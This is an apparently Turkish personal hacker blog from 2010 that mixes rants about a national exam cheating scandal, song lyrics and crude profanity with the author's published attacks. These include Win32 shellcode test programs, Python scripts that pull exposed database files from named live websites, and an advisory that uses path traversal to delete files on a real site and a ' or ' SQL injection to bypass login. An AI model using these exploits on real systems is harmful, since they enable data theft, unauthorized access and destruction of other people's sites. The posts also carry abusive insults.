0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1


# Title : win32/xp sp3 (Tr) About Box Shellcode 77 bytes
# Proof : http://img707.imageshack.us/img707/2276/infoja.jpg
# Plat. : win32
# Author : ZoRLu / http://inj3ct0r.com/Author/577
# mail-msn : admin@yildirimordulari.com
# Home : http://z0rlu.blogspot.com
# Date : 30/09/2010
# Tesekkur : r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
# Lakirdi : Genclik Gidin Kahvede Batak, Pispirik, Okey vs Oynayin ama Okumayin amina koyim / Kpss Anani ...
# Lakirdi : Son 32 Gun


#include
#include
#include

int main(){

unsigned char shellcode[]=
"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x2b\x53\xbb\xad\x23\x86\x7c"
"\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x52\x55\x4e\x44\x4c\x4c"
"\x33\x32\x2e\x45\x58\x45\x20\x73\x68\x65\x6c\x6c\x33\x32\x2c\x53\x68"
"\x65\x6c\x6c\x41\x62\x6f\x75\x74\x41";

printf("Size = %d bytes\n", strlen(shellcode));

((void (*)())shellcode)();



return 0;
}


# Inj3ct0r.com [2010-09-30]

28 Eylül 2010 Salı

deniz hanıma hitaben : )

"selam sorunuma nette çözüm araken tesadüf sitenize girdim..yardım edebilirseniz sevinirim etmesenizde canınız sağolsun..kısaca bloğumdaki, çekip bir sürü detaylı işlemden sonra yayınladığım tüm videolar ne olduysa yokoldu hiçbiri izlenmiyor orjınalleride elimde yok ..çözümü varmı.. bu konuya değinebilirmisin :))"

yorumunuzu okudum konuya uzun uzun değinmek isterdim ama inanın hiç bir fikrim yok :( burdan yardımcı olabileceklere bi seslenelim belki çözüm önerileri gelir. umarım çözüme kavuşur kısa zamanda. Arkadaşlar sorun yukardaki yorumda belirtilmiş çözümü bilen yazsın lütfen

//Not: Ben çözümü buldum ver şifrelerini halledeyim falan diyen hiç kimseye güvenmeyiniz mümkünse çözümü bilen tarif etsin siz halledin panelden :) kolay gelsin

25 Eylül 2010 Cumartesi

Blogger Kod Renklendirme / Syntax Highlighter Eklentisi

a.q 2 yıl sonra anca yapabildim :PPP doğru dürüst anlatanda yoktu zaten :S










yukarıdaki kodları kumanda paneli >> tasarım >> HTML'yi Düzenle yolunu takip ederek



body



tagının altına ekleyin ve sablonu kaydedin

kullanımı:


kodlar buraya

kodlar buraya

kodlar buraya






18 Eylül 2010 Cumartesi

2 ay :/

sınav olup bitinceye kadar yine yokum ne işe çattık a.q pazartesi tekrardan ders başı :S işi gücü bırakıp yeniden eğitim çalışacaz, sıçmadığımız boku biz niye temizliyoruz anlamış değilim :S neyse hakkınızı helal edin belki sınav sonrasına kadar daha giremem nete falan.

eğitim bilimleri iptal edildi

offf sil baştan amuğa şaplak atim. yav soruları çalanında, çalanlardan alıp kopya çekeninde, 3 kurusa tamah edip anasını bacısını bu kadar ucuza dillere düşüreninde, bu piçlere öğretmen adayı gözüyle bakanında ... ulan ananız sizi doğurmamış sıçmış. babanız ananıza atlayacağına dağa taşa atlasaymış piç kuruları.

3227 orospu çoçuğu / sınav sorusu

1) 3227 orospu çocuğunun kopya çektiği açıkça bilinmektedir fakat ıspatlanamamıştır.kopya ve sonraki olaylar üstünden bir ay geçmiştir. sınavı iptal edilen 287 bin aday bulunmaktadır. soruları çalanlara kopya olayı dillendiği günden itibaren küfredilmektedir. örnek: sikiyim soruları çalanların ( anasını+avradını+bacısını+gelmişini+geçmişini+soyunu+sopunu).
hakkına girilen her bir bireyin günde en az bir kere bu şekilde küfrettiği de bilinmektedir.3227 orospu çoçuğundan her birinin payına 1 ay boyunca edilen küfürlerden ne kadar düşmektedir?

2a) "3227 orospu çocuğu" filmi çekilirse 287 bin kişinin filme gideceği bilinmektedir. bir bilet 6 liradan satıldığına göre 3227 orospu çocuğunun gişe hasılatı ne kadar olur?

2b) elde edilen hasılat giden şerefi, namusu, haysiyeti kurtarır mı?

3) "3227 orospu çocuğu" nun anasını öğelerine ayırınız

4) 3227 orospu çocuğunun tövbesi kabul olur mu?

5) 3227 orospu çocuğunu en kısa yoldan nasıl suya götürüp sikip getirebilirsiniz?

win32/xp sp3 (Tr) calc.exe Shellcode 53 bytes



http://inj3ct0r.com/exploits/14089
http://www.shell-storm.org/shellcode/files/shellcode-704.php


# Title : win32/xp sp3 (Tr) calc.exe Shellcode 53 bytes
# Proof : http://img178.imageshack.us/img178/548/proofxw.jpg
# Author : ZoRLu / http://inj3ct0r.com/author/577
# mail-msn : admin@yildirimordulari.com
# Home : http://z0rlu.blogspot.com
# Date : 15/09/2010
# Tesekkur : inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
# Temenni : Yeni Anayasamiz Hayirli Olsun
# Lakirdi : I dont know very well assembly. but, I know I will learn its too :P


#include
#include
#include

int main(){

unsigned char shellcode[]=
"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x13\x53\xbb\xad\x23\x86\x7c"
"\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x63\x61\x6c\x63\x2e\x65"
"\x78\x65";

printf("Size = %d bytes\n", strlen(shellcode));

((void (*)())shellcode)();

return 0;
}

win32/xp sp3 (Tr) cmd.exe Shellcode 52 bytes



http://inj3ct0r.com/exploits/14087
http://www.shell-storm.org/shellcode/files/shellcode-705.php



# Title : win32/xp sp3 (Tr) cmd.exe Shellcode 52 bytes
# Proof : http://img59.imageshack.us/img59/6499/proofc.png
# Author : ZoRLu / http://inj3ct0r.com/author/577
# mail-msn : admin@yildirimordulari.com
# Home : http://z0rlu.blogspot.com
# Date : 15/09/2010
# Tesekkur : inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
# Temenni : Yeni Anayasamiz Hayirli Olsun
# Lakirdi : I dont know very well assembly. but, I know I will learn its too :P


#include
#include
#include

int main(){

unsigned char shellcode[]=
"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x12\x53\xbb\xad\x23\x86\x7c"
"\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x63\x6d\x64\x2e\x65\x78"
"\x65";

printf("Size = %d bytes\n", strlen(shellcode));

((void (*)())shellcode)();

return 0;
}


# Inj3ct0r.com [2010-09-15]

17 Eylül 2010 Cuma

2 yıl geçmiş


blog online olalı 2 yılı geçmiş vay a.q yaşlanıyoruz :P ilk yazılara bi göz attımda vay be tam bi amatörmüşüm aman kelimeleri özenle seçmeler bi açıklamalar yapmalar falan filan :DD şimdi çükümde deel :D

arwin - odfhex download

shellcode vs ilgilenenler için kullanışlı iki materyal

arwin kullanımı:

arwin libname Funcname

örnek:

arwin kernel32.dll Sleep

yada

arwin kernel32 WinExec vs. vs.

odfhex kullanımı


odfhex file

örnek:

odfhex dosyamiz.txt

indir:

http://hotfile.com/dl/69956685/36cbe9f/arwin-odfhex.rar.html

beni bırakma ellere

beni bırakma ellere... | izlesene.com



Yasayamam ben yoklugunu kaldiramaz bedenim
Ölürsem bil buralarda sensin ilk nedenim
Gidiyorum al senin olsun yalan askin sevgilim
Alisamam ama biliyorum elde mi çaresizim

Beni birakma ellere ellerde yasayamam
Zehir olur her gece bana sabahlara varamam
Tutunamam düserim her kösede hayaline kanarim
Bilemezsin sen beni ben sana nasil yanarim

Bana geri ver simdi kaybettirdigin o yillari
Seninle buldum sanarken çaldigin mutluluklari
Nasil olur bir kalbin var sende can tasiyorsun
Adaleti bumu askin, söyle sen böyle mi seviyorsun.

Beni birakma ellere ellerde yasayamam
Zehir olur her gece bana sabahlara varamam
Tutunamam düserim her kösede hayaline kanarim
Bilemezsin sen beni ben sana nasil yanarim

15 Eylül 2010 Çarşamba

win32/xp sp3 (Tr) MessageBoxA Shellcode 109 bytes

http://inj3ct0r.com/exploits/14079
http://www.packetstormsecurity.org/shellcode/mesboxa-shellcode.txt
https://www.shell-storm.org/shellcode/files/shellcode-703.php

/ blogspotun bok yemezliği kodlar net cıkmıyo direk linklerden bakın ;)



epeydir kurcalıyodum ama adam akıllı bu konuyla ilgii Türkçe tek bir döküman yada video bulamadım ya bilen yok yada bilipte anlatmayanlar çok bu konu içinde küçük bir projem var şu kpss olayı netleşsin. biraz assembly den cakmak lazım hatta biraz değil çok :( ee ben kurcaladım ve bi sonuca ulaştım ilerleyen günlerde shellcode yazma ile ilgili bi video cekerim ;)işte ilk yazdığım ilk shellcode:

http://inj3ct0r.com/exploits/14079


# Title : win32/xp sp3 (Tr) MessageBoxA Shellcode 109 bytes
# Proof : http://img443.imageshack.us/img443/7900/proofaz.jpg
# Author : ZoRLu
# mail-msn : admin@yildirimordulari.com
# Home : z0rlu.blogspot.com
# Date : 14/09/2010
# Tesekkur : inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
# Temenni : Yeni Anayasamiz Hayirli Olsun
# Lakirdi : I dont know very well assembly. but, I know I will learn its too :P


#include
#include
#include

int main(){

unsigned char shellcode[]=
"\x31\xc0\x31\xdb\x31\xd9\x31\xd2\xeb\x35\x59\x88\x51\x0a\xbb\x7b\x1d"
"\x80\x7c\x51\xff\xd3\xeb\x37\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\x30"
"\xae\x80\x7c\xff\xd3\xeb\x37\x59\x31\xd2\x88\x51\x07\x52\x52\x51\x52"
"\xff\xd0\x31\xd2\x50\xb8\xfa\xca\x81\x7c\xff\xd0\xe8\xc6\xff\xff\xff"
"\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc4\xff\xff\xff\x4d"
"\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc4\xff\xff\xff\x69"
"\x74\x73\x20\x6f\x6b\x21\xff";

printf("Size = %d bytes\n", strlen(shellcode));

((void (*)())shellcode)();

return 0;
}


# Inj3ct0r.com [2010-09-14]

13 Eylül 2010 Pazartesi

Ozan ARİF - Değişen Kim




DEĞİŞEN KİM?


Allah'ını seven dosdoğru desin,
Değişen ben miyim yoksa onlar mı?
Şeriat siz olun parmağı kesin
Değişen ben miyim, yoksa onlar mı?


Bize katil diye ağır hakaret
Edenlerle ben mi kurdum hükumet
Beni de yargıla ama insaf et
Değişen ben miyim, yoksa onlar mı?


Ben mi ihraç edip vekil susturdum,
Veya bakan dövüp, terör estirdim,
Bir sürü gönülü ben mi küstürdüm,
Değişen ben miyim, yoksa onlar mı?


Dikkat et burada her işin başı,
Ne ülkü doydular ne ülküdaşı,
Ben mi size dedim yol arkadaşı,
Değişen ben miyim, yoksa onlar mı?


Doğrudur, konuştum, asla susmadım,
Çünkü ben yanlışa imza basmadım,
Apo denen iti ben mi asmadım,
Değişen ben miyim, yoksa onlar mı?


Ben asmamış olsam, o ipi atmam
Atarsam Meclis'te piç eli tutmam
Nezaket, mezaket ben bunu yutmam
Değişen ben miyim, yoksa olar mı?


Eşarplı bacımı ya vekil seçmem,
Yahut da seçersem başını açmam,
Kavga ise kavga, kavgadan kaçmam
Değişen ben miyim, yoksa onlar mı?


Nerde o beraber yapılan toylar,
O güzel geceler, o kurultaylar,
Kurultay da olsa, gelmiyor baylar,
Değişen ben miyim, yoksa onlar mı?


Sen geldin mi sanki derseniz şimdi
Derim ki gelip de kovulan kimdi
Ben geldim, kurultay benim işimdi
Değişen ben miyim, yoksa onlar mı?


Değişmek başkadır, gelişmek başka
Ben hala bağlıyım o eski aşka
Başbuğum söylerdi, sağ olsa keşke
Değişen ben miyim, yoksa onlar mı?


Ülkücülük ölçüm, tartım da aynı
Kuralım da aynı, şartım da aynı
Ve onlara rağmen, partim de aynı
Değişen ben miyim, yoksa onlar mı?


Ozan Arif yeter, kafidir bunlar
Anladıysa eğer erbaş olanlar
Başçavuş da eşek değil ya anlar,
Değişen ben miyim, yoksa onlar mı?

OZAN ARİF

10 Eylül 2010 Cuma

Nasm Download

writing shellcode for win vs vs // ilgilenenler bilir

Download NASM v0.98.38

http://webster.cs.ucr.edu/AsmTools/NASM/nasm-0.98.38-win32.zip

hayırlı bayramlar

cümleten hayırlı bayramlar

8 Eylül 2010 Çarşamba

ASPired2Count File Disclosure Exploit (.py)

http://inj3ct0r.com/exploits/14039



#!/usr/bin/env python
#-*- coding:cp1254 -*-

'''
# The Net Guys ASPired2Count File Disclosure Exploit (.py)
# its not database
# Demo: http://thenetguys.us/ASPired2/count/ASPired2Count.mdb
# Found & Exploit Coded By ZoRLu
# msn-mail: admin@yildirimordulari.com
# Home: z0rlu.blogspot.com
# Date: 08/09/2010
# My python Vers: 2.7 download: http://www.python.org/download/
# Tested on my xp professional, proof: http://i55.tinypic.com/5u4c9u.jpg
# Tesekkur : inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N and all Friends
# Temenni : Hayirli Bayramlar
# ZoRLu : Python Lover
# Note : Dont Forget My Python Vers: 2.7
'''

import sys, urllib2, re, os, time

def indiriyoruz(url):

import urllib
aldosyayi = urllib.urlopen(url)
indiraq = open(url.split('/')[-1], 'wb')
indiraq.write(aldosyayi.read())
aldosyayi.close()
indiraq.close()

if len(sys.argv) < 2:
import os
os.system('cls')
os.system('clear')
os.system('color 2')
print "_______________________________________________________________"
print " "
print " The Net Guys ASPired2Count File Disclosure Exploit (.py) "
print " "
print " coded by ZoRLu "
print " "
print ' usage: %s http://server.com/path/' % os.path.basename(sys.argv[0])
print " "
print "_______________________________________________________________"
sys.exit(1)

''' link kontrol 1 '''

add = "http://"
add2 = "/"
sitemiz = sys.argv[1]

if sitemiz[-1:] != add2:
print "\nwhere is it: " + add2
print "okk I will add"
time.sleep(2)
sitemiz += add2
print "its ok" + " " + sitemiz

if sitemiz[:7] != add:
print "\nwhere is it: " + add
print "okk I will add"
time.sleep(2)
sitemiz = add + sitemiz
print "its ok" + " " + sitemiz

vulnfile = "ASPired2Count.mdb"
url2 = sitemiz + vulnfile

''' link kontrol 2 '''

try:
adreskontrol = urllib2.urlopen(url2).read()

if len(adreskontrol) > 0:

print "\nGood Job Bro!"

except urllib2.HTTPError:
import os
import sys
print "\nForbidden Sorry! Server has a Security!"
sys.exit(1)


''' dosya indiriliyor '''

if __name__ == '__main__':
import sys
if len(sys.argv) == 2:
print "\nFile is Downloading\n"
try:
indiriyoruz(url2)
except IOError:
print 'Filename not found.'


# Inj3ct0r.com [2010-09-08]

7 Eylül 2010 Salı

BKBilisim Portal Multiple Vulnerability

http://inj3ct0r.com/exploits/14028



# BKBilisim Portal Multiple Vulnerability
# Author ZoRLu
# mail-msn: admin@yildirimordulari.com
# Home: z0rlu.blogspot.com
# Date: 07/09/2010
# Demo: http://www.bio-zeytolive.com
# Scrp: http://www.aspindir.com/Goster/5531
# Tesekkur: inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N and all Friends
# Temenni: Hayirli Bayramlar


1. Arbitrary File Delete

target: http://www.bio-zeytolive.com / i deleted index.asp

vuln. file:

/fiyat/editor.asp

example:

you look first here:

http://www.bio-zeytolive.com/upload.asp

after go here:

http://www.bio-zeytolive.com/fiyat/editor.asp?mode=delete&file=../upload.asp

more after go here:

http://www.bio-zeytolive.com/upload.asp

and you will see file is delete

or

you look fisrt here:

http://www.bio-zeytolive.com/kategoriadmin/kategori_sil.asp

after you go here:

http://www.bio-zeytolive.com/fiyat/editor.asp?mode=delete&file=../kategoriadmin/kategori_sil.asp

more after you go here:

http://www.bio-zeytolive.com/kategoriadmin/kategori_sil.asp

and you will see file is delete

you can do this, for any file

2. Bypass

Vuln. file:

giris.asp

//

kullanici = Request.Form("kullanici") //line 4
parola = Request.Form("parola") //line 5

sql="Select * From uyeler where onay=1 and kullanici = '"& kullanici &"' and parola = '" &parola&"' " //line 13

//

you go here:

http://www.bio-zeytolive.com/uye.asp

kullanici adi: zrl or write anything

parola: ' or '

you will be login


# Inj3ct0r.com [2010-09-08]

Live School Portal Database Disclosure Exploit (.py)

http://inj3ct0r.com/exploits/14023



#!/usr/bin/env python
#-*- coding:cp1254 -*-

# Live School Portal Database Disclosure Exploit (.py)
# Demo: http://afcio.com/Db/liveokul.mdb
# Found & Exploit Coded By ZoRLu
# msn-mail: admin@yildirimordulari.com
# Home: z0rlu.blogspot.com
# Date: 07/09/2010
# My python Vers: 2.7 download: http://www.python.org/download/
# Tested on my xp professional, proof: http://img835.imageshack.us/img835/7465/livet.jpg
# Tesekkur : inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N and all Friends
# Temenni : Hayirli Bayramlar

import sys, urllib2, re, os, time

def indiriyoruz(url):

import urllib
aldosyayi = urllib.urlopen(url)
indiraq = open(url.split('/')[-1], 'wb')
indiraq.write(aldosyayi.read())
aldosyayi.close()
indiraq.close()

if len(sys.argv) < 2:
import os
os.system('cls')
os.system('clear')
os.system('color 2')
print "_______________________________________________________________"
print " "
print " Live School Portal Database Disclosure Exploit (.py) "
print " "
print " coded by ZoRLu "
print " "
print ' usage: %s http://server.com/path/' % os.path.basename(sys.argv[0])
print " "
print "_______________________________________________________________"
sys.exit(1)

add = "http://"
add2 = "/"
sitemiz = sys.argv[1]

if sitemiz[-1:] != add2:
print "\nwhere is it: " + add2
print "okk I will add"
time.sleep(2)
sitemiz += add2
print "its ok" + " " + sitemiz

if sitemiz[:7] != add:
print "\nwhere is it: " + add
print "okk I will add"
time.sleep(2)
sitemiz = add + sitemiz
print "its ok" + " " + sitemiz

vulnfile = "Db/liveokul.mdb"
url2 = sitemiz + vulnfile

if __name__ == '__main__':
import sys
if len(sys.argv) == 2:
print "\nFile is Downloading\n"
try:
indiriyoruz(url2)
except IOError:
print 'Filename not found.'


# Inj3ct0r.com [2010-09-08]

4 Eylül 2010 Cumartesi

zoreader.pl

kodladığım bi dosya vardı bulamıyorum bulsam paylasıcam yeniden kodlamaklada uğrasmak istemiyorum. madem hack vs bıraktık baskaları faydalansın. dosya ile kolayca server da config vs okuyabiliyorsunuz bulunca paylaşırım ;)

Öğretmenler için ayrı sınav gündemde

yav arkadaş simdi jeton düştü yıllardır aynı olan sistemi simdi mi değişeceksiniz la bi durun biz gidelim sonra ne napıyosanız yapın o kadar eğitim vs calıştık boşamıydı :S haberin detayları:

KPSS'deki kopya skandalının ardından Milli Eğitim Bakanlığı, öğretmenler için ayrı sınav yapılması yönünde çalışmalar başlattı.

Bakan Nimet Çubukçu, "Öğretmen yeterliliği sınavının MEB tarafından yapılması gerek. Çünkü beden öğretmeninin KPSS'yi geçmesi mümkün değil. Çünkü o alanla hiçbir eğitim almamış" dedi

KPSS'deki kopya skandalının ardından Milli Eğitim Bakanlığı, öğretmenler için ayrı sınavın gündeme alınması konusunda çalışmalar başlattı. Milli Eğitim Bakanı Nimet Çubukçu da öğretmen yeterliliklerini belirleme konusunda KPSS'nin yeterli olmadığını ve öğretmenler için milli Eğitim Bakanlığı'nın bir sınav yapması gerektiğini söyledi.

KPSS DOĞRU SONUÇ VERMİYOR

Milli Eğitim Bakanı Nimet Çubukçu katıldığı bir televizyon programında öğretmen adaylarının KPSS sınavına girmesini çok doğru bulmadğını söyledi. Çubukçu, sözlerine şöyle devam etti: "KPSS 1999 yılından itibaren uygulanıyor. 11 yıl önce bu doğru bir uygulama olabilir ama bugün geldiğimiz noktada öğretmenlikte KPSS'nin yeteri kadar ölçme ve değerlendirme de doğru sonuçlar verdiğini düşünmüyorum. Açıkcası KPSS değil ama bir öğretmen yeterliliği belirlemek ve bu sınavın MEB tarafından yapılması daha doğru. Elbette objektif kurallara bağlı olarak bu sınav yapılmalı."

DERSHANELERE GİDİYORLAR

Bir öğretmenin kendi alanında yeterliliğinin ölçülmesinin kafi olacağını söyleyen Çubukçu, "Bireysel öğretmenlik, fizik öğretmeni, beden öğretmeni gibi alanların KPSS'yi geçmesi mümkün değil. Çünkü o alanla hiçbir eğitim almamışlar. Ayrıca bunun için bir çaba sarfediyorlar, dersaneye gidiyorlar, mücadele ediyorlar. Doğrusunu isterseniz bir öğretmenin kendi alanında yeterliliğinin ölçülmesinin ben kafi olacağını düşünüyorum. Bu konuda da çalışmalarımız var" dedi.

HER BRANŞA AYRI SINAV

Milli Eğitim Bakanlığı kendi bünyesinde bulunan Eğitim Teknolojileri Genel Müdürlüğü'nün yapacağı sınavla öğretmen adayları alımında uygulanacak puanların belirlenmesini planlanıyor. Milli Eğitim Bakanlığı, her branş için alacağı öğretmenleri ayrı sınava tabi tutmayı planlıyor.

Eğitim Teknolojileri Genel Müdürlüğü, Seviye Belirleme Sınavı ile Parasız Yatılılık ve Bursluluk Sınavı ile birçok kamu kurum ve kuruluşunun sınavlarını yapıyor

kaynak: http://www.memurlar.net/haber/175976/

// iptalini isteyen gavvatlar sakızınız düştü mü boka :DD

KPSS iptal yolunda / iptalini isteyenler kıçınıza kına yakın piç kuruları

gençler bu sınav gider gibi gözüküyo :(( baska usülsüzlükler de çıkmış ortaya sınava tekrar girecek olanlara tavsiyem simdiden baslayın çalışmaya çünkü ben öyle yapıcam yök 10 gün içinde karara varıp raporunu bildircekmiş. ülkemizde hep böyledir önce dedikodusu baslar bir olayın sonrada gercekleşir. işte haberin detayları:

YÖK Denetleme Kurulu KPSS'nin iptalini gündeme aldı. Rapor savcıdan gelecek bilgiler doğrultusunda son şeklini alacak

Yüksek Öğretim Kurumu (YÖK) Denetleme Kurulu, KPSS'de kopya iddialarıyla ilgili başlattığı soruşturmanın raporunu en geç 10 gün içinde tamamlayacak. Ön rapor sonuçlarına gore 30 bin öğretmen atamasını durduran YÖK Denetleme Kurulu, sınavın tümünün iptalini görüşüyor. Kurul raporuna, savcıdan gelecek bilgilere gore son şeklini verecek. Devlet Denetleme Kurulu, YÖK ve Savcılık tarafından üç koldan mercek altına alınan KPSS skandalına son noktayı YÖK koyacak. Kopya iddialarının ardından ÖSYM'de inceleme yapan YÖK Denetleme Kurulu'nün ön raporunda, "kopya var" kanaati üzerine, Milli Eğitim Bakanlığı 30 bin öğretmen ataması erteleme kararı almıştı. Konuyu araştıran Ankara Cumhuriyet Savcılığı'nı 'fiziki tespitte' bulunmak üzere inceleme yapmaya çağıran YÖK'ün, nihai raporunu en geç 10 gün içinde tamamlaması bekleniyor. YÖK Denetleme Kurulu Başkanı Prof. Dr. Mustafa Solak'ın, soruşturmayı yürüten savcı ile sık sık biraraya gelerek gelişmeleri değerlendirdiği öğrenildi. YÖK kaynaklarından edinilen bilgiye gore, Denetleme Kurulu'nun raporu ile ÖSYM'de kopya dışında bazı usulsüzlüklerin de tespit edildiği ortaya çıktı. Özellikle, sınav sorularının yer aldığı bilgisayarların şifrelerinin kurum içinde 'kulaktan kulağa' dağılması ve görevi ihmalden bazı üst düzey görevliler hakkında soruşturma başlatılması raporda yer aldı. Soruşturmanın tamamlanmasının ardından ÖSYM'de yeniden bir yapılandırma gündeme gelecek. YÖK yönetimi, Denetleme Kurulu'nun raporuna gore, ÖSYM Başkanı Prof. Dr. Ünal Yarımağan'ın görevde kalıp kalmayacağına da karar verecek. KPSS'de kopya iddialarının ardından Yarımağan istifa edeceğini açıklamıştı.

kaynak: http://www.memurlar.net/haber/175975/

2 Eylül 2010 Perşembe

sınav tamamen iptal edilsin diyen atlara



bu aralar pek bi moda sınav tamamen iptal edilsin demek pezevenklere bak ben aylarca calışacam sen yatacan sonra soruları bir kaç orospu cocuğu birilerine satacak derken bu rakam 3500 lere ulaşacak ve buda sınavın iptalini gerektirecek yok ya :S a.q bebeleri kısmi iptal dururken sınav neden tamamen iptal edilsin ki. tamamen iptalini savunanlar arastırılsın eminim bu pezevenkler aylarca yatmıs ve düşük puan almıs kisilerdir güya iptal edilirse gidip calısacaktakta yüksek puan alacak oldu :S ben eminim ki soruları ele gecirenler bulunacak siz merak etmeyin kısmi iptal olcak her ne kadar bu sizin işinize yaramayacaksada :DD sinavın tamamen iptal edilmesini isteyenlere aşağıdaki resim herseyi acıklıyor sanırım :DD

//yorumlardaki gibi düşünenlere sitemim

sizi sevmeyen ölsün

işte kv setinden kareler mematinin ifadeler bitirdi beni












31 Ağustos 2010 Salı

soruları çalan namussuzlara

ne bekliyodunuz ben ve ben gibiler aylarca calısacak sizde beleşten atanıcaksınız öylemi ? oldu baska ? işte böyle ipliğiniz pazara çıkar. düşünebiliyor musunuz adam hırsız olcak ve gidecek genc nesiller yetiştirecek. ulan pezevenkler önce kendinizi eğitin, kendinizi yetiştirin. hırsızlığı mı öğreteceksiniz yeni nesile. soruları calanlar: alayınız orospu çoçuğu.

KPSS kopya skandalı nereye doğru gidiyor?

Artık şu görülmektedirki, ortada bir delil olmasa da, 350 adayın 120 net, 3000'ü aşkın adayın da 110'dan fazla net yapmış olması imkansıza yakın görünmektedir. Ancak sorun kopya skandalının nasıl ortaya çıkarılacağındadır.

Savcılık dışında kalan Devlet kurumlarının yapacağı araştırma istihbari ve adli bir nitelik taşımadığı için bir noktada tıkanmaktadır. Gerek ÖSYM, gerek YÖK, gerek MEB gerekse de Cumhurbaşkanlığı şuan için bu 3 bini aşkın adayın ortak niteliğini araştırmaktadır. Fakat bu araştırmalardan bir delile gidilmesi zor görünmektedir. Bu durum YÖK Denetleme Kurulu incelemesinde de ortaya çıkmıştır. Bizzat YÖK Başkanı hala bir delile ulaşılamadığını açıklamıştır.

Bu nedenle, Savcılık soruşturması çok daha önemli bir hale gelmiştir. Zira, gerek telefon dinlemesi gerek istihbarat gerekse de adli diğer detaylara ulaşma yetkisi Savcılıktadır. Savcılık bu işte Emniyet kanalıyla çalışacaktır. Dolaysıyla emniyet istihbarattaki polislere büyük iş düşmektedir. Ancak bu noktada, bazı ziyaretçiler, suçu hem bir gruba attığı hem de bu grubun Emniyette güçlü olduğu ifade edildiği için, soruşturmadan da bir şey çıkmayacağı da ifade edilmektedir. Böyle bir durumun oluşması yani savcılık soruşturmasından da bir şey çıkmaması halinde, bizzat YÖK Başkanının, "350 adayın 120 net yapması mümkün değil, sorular elden ele dolaşmış" şeklinde yaptığı açık tespit oratada kalacaktır. Bu nedenle Savcılığın söz konusu grupla ilgili iddiaları da göz önüne alarak, işi yürütecek Emniyet personeline dikkat etmesi uygun olacaktır.Aksi bir durumda hem Devlet hem kurumlar hem de yargı makamı büyük güven kaybına uğrayacaktır. 800 bin adayın gözü bu soruşturmadadır.

Burada bir diğer husus da şudur: Savcılık soruların elden ele dolaştığını tespit etmiş olsa dahi, bu soruların kaç kişiye sızdığı nasıl bulunacaktır. Zira 120 net yapan aday üzerindeki teşhis fazla zor değildir. Ancak 100 veya daha fazla net yapan adaylara da soruların sızıp sızmadığını bulmak çok zor olacaktır. Oluşan durumu yeni bir fırsat olarak görüp sınavın iptalini isteyen adaylar dışında kalan 800 bine yakın aday sınavın iptalini istememektedir. Ancak Savcılığın yapacağı tespit sonrasında eğer soruların sınav öncesinde sızdığı tespit edilirse, bu aşamadan sonra soruların kaç kişiye sızdığını, soruları alan kişilerin bu soruları hangi arkadaşlarına servis ettiği, onların kimse servis ettiği gibi sorulara da yanıt bulunması gerekecektirki, bu oldukça zor bir tespit olacaktır.

Hem adaylar hem memurlar.net olarak, Savcılığın bu konuyu son yılların en büyük skandalı olarak görmesini umut ediyoruz.

kaynak: http://www.memurlar.net/haber/175649/

29 Ağustos 2010 Pazar

Türk Eğitim-Sen, KPSS'deki kopya iddiası için belge açıkladı

350 adayın 120 soruyu doğru cevaplaması ve 3 bine yakın adayın da 110'un üzerinde net çıkardığı 2010 yılı KPSS Eğitim Bilimleri testindeki kopya iddialarına ilişkin ilk ciddi belge Türk Eğitim Sen tarafından açıklandı. Türk Eğitim Sen Başkanı İsmail Koncuk, 116 sorunun 5 Temmuz'da Uludağ Üniversitesinden mezun bir öğretmen adayına mail yoluyla gönderildiğine dair belgeyi Savcılığa verdiğini açıkladı.

Türk Eğitim-Sen Genel Başkanı İsmail Koncuk, KPSS'den önce eğitim bilimleri sorularının ham halinin Uludağ Üniversitesi Sınıf Öğretmenliği bölümünden 2007'de mezun olan bir kişinin e-mail adresine servis edildiğini öne sürdü.

Koncuk, sendika genel merkezinde düzenlediği basın toplantısında, sendika tarafından yapılan tespitlere göre, KPSS'ye ilişkin iddiaların 50-100 kişiyle sınırlı olmadığını, binlerce kişiye soruların servis edildiğini yüzde 100 ispat ettiklerini savundu.

Olayların ortaya çıkmasından adeta bir korku duyulduğunu iddia eden Koncuk, “Bu işi yapanların ortaya çıkmasından da korkuluyor. Belki bu olaylar, geçmiş yıllarda da yapıldı ancak, bu yıl ortaya çıktı. (Benim adamım yaparsa her şey mübahtır) anlayışı Türkiye'yi uçurumun kenarına sürükler, bu anlayıştan kurtulmak lazım. Ahlaksızlığı yapan ahlaksızdır, namussuzluğu yapan namussuzdur. Bunu tespit edemediğimiz sürece emin olun ülkenin geleceği hiç de iyi değildir” dedi.

“ŞİFRE VERİLEREK SORULAR DAĞITILDI İDDİASI”

